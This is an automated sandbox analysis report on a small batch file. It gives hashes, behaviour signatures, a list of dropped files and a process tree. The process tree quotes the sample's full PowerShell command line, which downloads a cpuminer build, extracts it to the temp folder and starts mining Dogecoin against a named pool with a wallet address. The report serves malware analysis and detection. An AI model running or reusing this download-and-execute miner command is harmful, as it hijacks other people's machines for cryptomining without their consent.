Analysis
- max time kernel: 1793s
- max time network: 1804s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03/02/2024, 03:05

Static task: static1

Behavioral task: behavioral1
- Sample: 73u3Ito.bat
- Resource: win10-20231215-en

Behavioral task: behavioral2
- Sample: 73u3Ito.bat
- Resource: win10v2004-20231215-en

General
- Target: 73u3Ito.bat
- Size: 499B
- MD5: fe74bff27516829a88cfbc6f6e99646f
- SHA1: 0c15d859211c79910b277d07e729bec7197a60cd
- SHA256: b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
- SHA512: a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow | pid | Process
  10 | 5044 | powershell.exe
  12 | 5044 | powershell.exe
- Executes dropped EXE (1 IoC)
  pid | Process
  2260 | cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
  pid | Process
  2260 | cpuminer-sse2.exe
  2260 | cpuminer-sse2.exe
  2260 | cpuminer-sse2.exe
  2260 | cpuminer-sse2.exe
  2260 | cpuminer-sse2.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | Process
  5044 | powershell.exe
  5044 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 5044 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description | pid | Process | procid_target
  PID 3744 wrote to memory of 5044 | 3744 | cmd.exe | 85
  PID 3744 wrote to memory of 5044 | 3744 | cmd.exe | 85
  PID 5044 wrote to memory of 3560 | 5044 | powershell.exe | 94
  PID 5044 wrote to memory of 3560 | 5044 | powershell.exe | 94
  PID 3560 wrote to memory of 2260 | 3560 | cmd.exe | 96
  PID 3560 wrote to memory of 2260 | 3560 | cmd.exe | 96
Processes (process tree; indentation shows parent/child relationship)
- C:\Windows\system32\cmd.exe (PID 3744)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5044)
    Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 3560)
      Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe (PID 2260)
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
        Signatures: Executes dropped EXE; Loads dropped DLL
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 507KB
  MD5: 95e06ecc2da194ea65ac5f846331efa7
  SHA1: 8a9f53fec35e901ba3a181d17d151bef63829300
  SHA256: 7bb0f84b2ae3ec64b9ff7375d2bc86d46988d9dd08d751f306aa3cf9434ce129
  SHA512: b94c642575ab7dbc1de5fee8b3cb560ba0a5045448395eddf6231427cdfa04add7c3796a1d3f2c9b07da2b342d3b79695c2412cb2ce0f1e4723b17f34bd6d9c5
- Filesize: 267KB
  MD5: 7ed5b443ebbb6fb6bf5deb779a31b8ca
  SHA1: 67f42a7e4c6a0c20eb02c993cdb75c274e10a0b5
  SHA256: a5f0f72da4c572a0761a1decc11a6bd72bee578cb46daea089062dfc812f746e
  SHA512: 5d7a8b9b2d7241ba6c15856dffdd7b6445efa16882258d100d7b91bdbf25e9709bdd80b901fe629410b1cc8672c7b3ae6a2cb35cfc860f25704dc09d9d11fa22
- Filesize: 199KB
  MD5: 5fa6de0505be34131ff98d1f36d8473d
  SHA1: d251d9d3330e68b8c1688592fd5f0dd48745df7d
  SHA256: 108225011ee6c99a21b8cf9ab72d9915fe38ec032dddfda8f2679f2226911e70
  SHA512: c463ddfceb8d70859be2f8ba93877c3c3823aad35ae4e34c11d5ae5bd57d44d8d02e0479e2fbc51d974d6a3791be9bfc9af456db615b3774bc37f4a47089b643
- Filesize: 125KB
  MD5: 20d80611a3bfe2c411debc261f462bfa
  SHA1: 443b598c493b328f11246d8aeacb7494c2ac226d
  SHA256: 9f8cdfb7480fe75034619a40517d25c4d5dec22f31cac6bd39681b48b996b399
  SHA512: af3889b79f0173a1c758538062601c0d413d644d7d43c5b3f1356e540c9fa60dcab0658f336de1be6ddc9e603f213d8b19b378ad55a7aa5a9400067bb916496b
- Filesize: 334KB
  MD5: 8f78a350e61f9f7f6667560b7110c9b3
  SHA1: 4d94228e9143c8842c23e94b39b8a5942d29e31a
  SHA256: 48307c39a415dc599b9f448e75d986c11e4e7c71e39202b2770488e82091d861
  SHA512: 2701063e0c26e1867769b762543ee17453b13bddb14fad56b8c9283dab5851c352b979a5398cee705bb52051ef95e0784f048dd7d2259144a179fc63324955d3
- Filesize: 113KB
  MD5: dd5df3afd33e921b98228ee77d96ef06
  SHA1: 67ae53f9ec24abd12be9b6541b56cd897535ae5c
  SHA256: 9701c8a3faa462a998e1bdc70d6c9add58ce6fceaba0e57b47f8cda038084019
  SHA512: d1080575e143c2d5b8f0e084d3d85657f570ee6a4629605cf4f1decf278b3586b21b0a50f6ce9f56c4407702b92eaee9ea751339a31712d6abcb5cc44e1b2563
- Filesize: 317KB
  MD5: 02aaf203fad6235cc91b39eae0c7a287
  SHA1: d9ecedafd3dcc2459de62a068acbd1faa1a21f82
  SHA256: feb39925c182fc96848b1c1bc2655cfd134ba219e76b3b8282f247b04053b07f
  SHA512: 62984327303ec9a5c707684c66b296df210c0c11f2c683462d864b98766113695a00de7af1307e3a6cfb27d0b455b697f82e38c6e490af98ee0ab815daaf50b7
- Filesize: 1.0MB
  MD5: cce92ab280ecc3c1cbd53b4e3c4aaaee
  SHA1: 95f555a425ca2dd726e42913adc5012f493398ee
  SHA256: 62744366b5d3dd4989892419f45fbd2aa0c34448160b673ff4430f006cb8fcc8
  SHA512: 482c0d2ceb980985ac6257e9274261c8c9016a367dfcca5e1dec9da22fb974bbf79ac7d9df0ad0381f90d2b768d81a5039a2a9765b57ceffcfa67710f8dff6b1
- Filesize: 716KB
  MD5: 878d1ae78a322f15e5dac720828254c7
  SHA1: 555261001ccc2aa0feec5e696fb172c5838870d8
  SHA256: befb15134ebce5b8c1d965f75980509adf956ce5c093d88830aa2e23487d0757
  SHA512: 40d3b9f7bbef63171090bb735927334fdf57ac9047d21dcf1b350974c04cebfeac25300e04059f80199a6ff221bea10c4b93e41d8c29e5578c825988cf19b016
- Filesize: 94KB
  MD5: 373afd9b72355d0ad30924a69374c71c
  SHA1: 9d2a3ba3c852f42dfff2ba3f0f28a673e48e869e
  SHA256: e8ca4986566648892fd6cb1b3a9d43ca0a6a9c1dc7f0eca66af9693bff3ce2a9
  SHA512: ae79d1771e8cb75c939341263767abca877a6bdcef640f94fadb228a9b6e14eda773b4c27588774779b869310233a0e33dfef71f0fea09dcd68a1e0db440e6de
- Filesize: 92KB
  MD5: a6839c937d2938fad2fa3495b65f6284
  SHA1: 35fbeb0d43dcbc146be8dcb48382ac8f5248b796
  SHA256: 1780e0333b7b76f454e77f11a3f96f52a5c08ae315b7df86ff5dc0c49bc2a904
  SHA512: 103ea0c713aa1622d90cf80017f485a54170cf298cb743eaa46457f020d678eb3674bf9cbb6eb2824b0aaaa104ed278770a0ed3b6dc4b0f4cdbc60bed4052194